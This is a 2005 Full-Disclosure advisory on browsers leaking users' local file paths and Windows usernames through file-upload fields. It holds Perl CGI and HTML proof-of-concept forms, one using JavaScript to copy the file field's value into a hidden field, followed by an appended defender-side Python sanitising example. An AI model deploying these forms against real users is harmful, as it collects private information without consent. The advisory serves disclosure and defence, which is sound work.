
| Subject: | [Full-Disclosure] Multi browser sensitive information disclosure |
|---|---|
| Date: | Fri, 04 Mar 2005 08:14:24 +0000 |
Multi browser sensitive information disclosure
I. DESCRIPTION:
Mr. upken disclosed this issue publicly on 19th Feb. 2005. Here is his advisory (in Japanese): http://xxx.upken.jp/report/ieup/ I have a few additional details to add to his original advisory.
II. IMPACT:
Disclosure of sensitive information to an unauthorised user.
III. TECHNICAL DETAILS:
RFC1867 is the standard definition of that "Browse..." button that you use to upload files to a Web server. It introduced the INPUT field type="file", which is that button, and also specified a multipart form encoding which is capable of encapsulating files for upload along with all the other fields on an upload form.
As Mr. upken has mentioned in his advisory, there is a weakness in "Form-based File Upload in HTML". "When we use Internet Explorer," he says, "secret or sensitive information can be exposed by malicious people."
I have tested some examples, and it is found that Firefox, Opera, and Internet Explorer have a weakness (tested on Windows XP SP2).
IV. Proof of Concept [A].
server-side Perl CGI (ask.cgi):

```perl
#!/usr/bin/perl
print "Content-Type: text/html\n\n";
die if $ENV{CONTENT_LENGTH} > 100*1024;
$objectname = "RFC1867";
# the first line of a multipart/form-data body is the boundary delimiter
$boundary = <STDIN>;
$boundary =~ s/\r\n//;
while (<STDIN>) {
    # the part header for our field looks like:
    # Content-Disposition: form-data; name="RFC1867"; filename="..."
    if ($_ =~ /$objectname/) {
        s/\r\n//;
        s/"//g;
        @dum = split(/filename=/, $_);
        $rfc1867 = $dum[@dum - 1];   # whatever the browser put after filename=
    }
}
$rfc1867 = &Filtertxt($rfc1867);   # keep the filtered value (the original dropped the return value)
print "$rfc1867\n";
exit(0);

sub Filtertxt {
    local($ft) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;   # was "$fd", a typo that left the text unfiltered
    return($ft);
}
```

client-side FORM:

```html
<form name="XA" method="POST" enctype="multipart/form-data"
      action="http://example.com/cgi-bin/ask.cgi">
  <input type="file" name="RFC1867">
  <input type="hidden" name="XB" value="HIDDEN">
  <input type="submit" value="Upload">
</form>
```
NOTE: Method is "POST". When we upload a file, %USERNAME%, Path, etc. is disclosed. I guess that only IE has a weakness.
V. Proof of Concept [B].
server-side Perl CGI (named ask2.cgi):

```perl
#!/usr/bin/perl
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
    # read the submitted variables from the POST body
    read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else {
    # read the submitted variables from the GET query string
    $buffer = $ENV{'QUERY_STRING'};
}
# split the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
    # set the name and value of each variable
    ($name, $value) = split(/=/, $pair);
    # turn each + into a space
    $value =~ tr/+/ /;
    # URL decode
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    # filter out bad characters & # < > " '
    $value = &Filtertxt($value);
    # store the variables in a hash
    $FORM{$name} = $value;
}
# print html
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";
exit(0);

sub Filtertxt {
    local($ft) = @_;
    $ft =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;   # was "$fd", a typo that left the value unfiltered
    return($ft);
}
```

client-side FORM:

```html
<form name="XA" method="GET" enctype="multipart/form-data"
      action="http://example.com/cgi-bin/ask2.cgi">
  <input type="file" name="RFC1867">
  <input type="hidden" name="XB" value="HIDDEN">
  <input type="submit" value="Upload">
</form>
```
NOTE: Method is "GET". When we try to upload a file, %USERNAME%, Path, etc. is disclosed. I guess that both Opera and IE have a weakness.
V. Proof of Concept [C]. The server-side Perl CGI is the same as in Proof of Concept [B].
client-side FORM:

```html
<form name="XA" method="GET" enctype="multipart/form-data"
      action="http://example.com/cgi-bin/ask2.cgi">
  <input type="file" name="RFC1867">
  <input type="hidden" name="XB" value="HIDDEN">
  <input type="submit" value="Upload"
         onclick="document.XA.XB.value=document.XA.RFC1867.value;return true">
</form>
```

NOTE: Method is "GET". When we try to upload a file, %USERNAME%, Path, etc. is disclosed. I guess that all of Firefox, Opera and IE have a weakness, using evil JavaScript scripting.
VI. Other browsers on other OSes: not tested. But......
VII. Is this a vulnerability?
Once, I had used Internet Explorer as an FTP tool. Today, when I was testing PoC [C], browsing for an upload file using Firefox, I found "MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg" and uploaded it to another server. Then my monitor displayed C:\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg
Oh, no. YB6J6PY3! It does not matter. I guess this is NOT a vulnerability, maybe.
VIII. Workaround
Do not upload any file onto an untrusted server. Do not attach any file (while sending webmail, posting to an ML, etc.). With JavaScript disabled, use Firefox.
IX. Credit
Discovery: upken
Additional Research: bitlance winter
BEST REGARDS.
-- bitlance winter
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
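A defender-side illustration of what the three PoCs exercise, added here as an example; it is not code from the original post or from upken's advisory. It builds a constructed multipart/form-data body for the PoC [A] form, parses it the way ask.cgi does (boundary-delimited parts, the `filename=` parameter of the Content-Disposition header), and then applies the server-side handling a site should use instead of echoing the value: keep only the leaf name, flag any `filename=` that carries directory components (a client leaking its local path, or a crafted request), and report which Windows account name such a path would reveal. It also covers the GET variants of PoC [B] and [C], where the file input's value arrives in the query string. The function names (`build_body`, `parse_multipart`, `handle_upload`, `handle_query_upload`), the boundary and the sample paths are assumptions for this example, and the parser is deliberately minimal (one level, quoted parameters only, no RFC 2231 encoding).

```python
import re
from urllib.parse import parse_qs

# Constructed sample input (not captured traffic): a boundary and bodies made up to
# resemble what the PoC [A] form produces from a client that puts its full local
# path into filename=.
BOUNDARY = b"----constructed-boundary-1867"
_PARAM = re.compile(r';\s*(\w+)="([^"]*)"')      # name="..." / filename="..." params
_PATH_SEP = re.compile(r"[\\/]")                   # both separators: Windows or Unix clients
_WIN_PROFILE = re.compile(r"^[A-Za-z]:\\(?:Documents and Settings|Users)\\([^\\]+)\\", re.I)


def build_body(client_filename, file_bytes=b"hello"):
    """Build a multipart/form-data body for the PoC [A] form (fields RFC1867 and XB)."""
    d = b"--" + BOUNDARY
    return b"".join([
        d, b"\r\n",
        b'Content-Disposition: form-data; name="RFC1867"; filename="',
        client_filename.encode("utf-8"), b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n",
        file_bytes, b"\r\n",
        d, b"\r\n",
        b'Content-Disposition: form-data; name="XB"\r\n\r\n',
        b"HIDDEN\r\n",
        d, b"--\r\n",
    ])


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser. Returns [{name, filename, data}, ...];
    filename is the raw, untrusted value exactly as the client sent it."""
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):                 # closing delimiter "--boundary--"
            break
        chunk = chunk.removeprefix(b"\r\n")
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            key, _, value = line.decode("latin-1").partition(":")
            headers[key.strip().lower()] = value.strip()
        params = dict(_PARAM.findall(headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"),
                      "filename": params.get("filename"),
                      "data": data.removesuffix(b"\r\n")})   # CRLF before delimiter is not data
    return parts


def filename_leaks_path(client_filename):
    """True when filename= carries directory components. A client following RFC 7578 sends
    only the leaf name, so a path here means a leaking browser or a crafted request."""
    return bool(client_filename) and _PATH_SEP.search(client_filename) is not None


def disclosed_username(client_filename):
    """The Windows account name a profile path in filename= would reveal, or None."""
    m = _WIN_PROFILE.match(client_filename or "")
    return m.group(1) if m else None


def safe_filename(client_filename):
    """Reduce an untrusted filename= value to a name safe to store, log or echo."""
    leaf = _PATH_SEP.split(client_filename or "")[-1]    # leaf component only
    leaf = re.sub(r"[^A-Za-z0-9._-]", "_", leaf)          # allow-list, not Filtertxt's strip-list
    leaf = leaf.strip("._")                               # removes "", ".", "..", dotfile names
    return leaf or "upload"


def assess(field_value):
    """Common handling of the RFC1867 field, whichever transport carried it."""
    return {"client_filename": field_value,               # retain for incident review only
            "stored_as": safe_filename(field_value),
            "path_disclosed": filename_leaks_path(field_value),
            "username": disclosed_username(field_value)}


def handle_upload(body, boundary=BOUNDARY):
    """Server side of PoC [A] (POST, multipart/form-data)."""
    parts = parse_multipart(body, boundary)
    upload = next(p for p in parts if p["name"] == "RFC1867")
    result = assess(upload["filename"])
    result["size"] = len(upload["data"])
    result["fields"] = {p["name"]: p["data"].decode("latin-1")
                        for p in parts if p["filename"] is None}
    return result


def handle_query_upload(query_string):
    """Server side of PoC [B]/[C] (GET): the browser ignores enctype and sends the file
    input's value (and the XB field copied by the onclick handler) in the query string."""
    form = {k: v[0] for k, v in parse_qs(query_string).items()}
    result = assess(form.get("RFC1867", ""))
    result["fields"] = {k: v for k, v in form.items() if k != "RFC1867"}
    return result


if __name__ == "__main__":
    print(handle_upload(build_body(r"C:\Documents and Settings\alice\My Documents\report.txt")))
    print(handle_upload(build_body("report.txt")))
    print(handle_query_upload("RFC1867=C%3A%5CUsers%5Cbob%5Creport.txt&XB=HIDDEN"))
```

Server-side handling cannot undo the disclosure itself: by the time ask.cgi runs, the path has already reached the server, which is why the post's workaround is on the client side. What the server can do is refuse to store, log verbatim or reflect the raw value into HTML (the concern Filtertxt addresses) and treat a `filename=` with directory components as a logged signal that a client is leaking its local path.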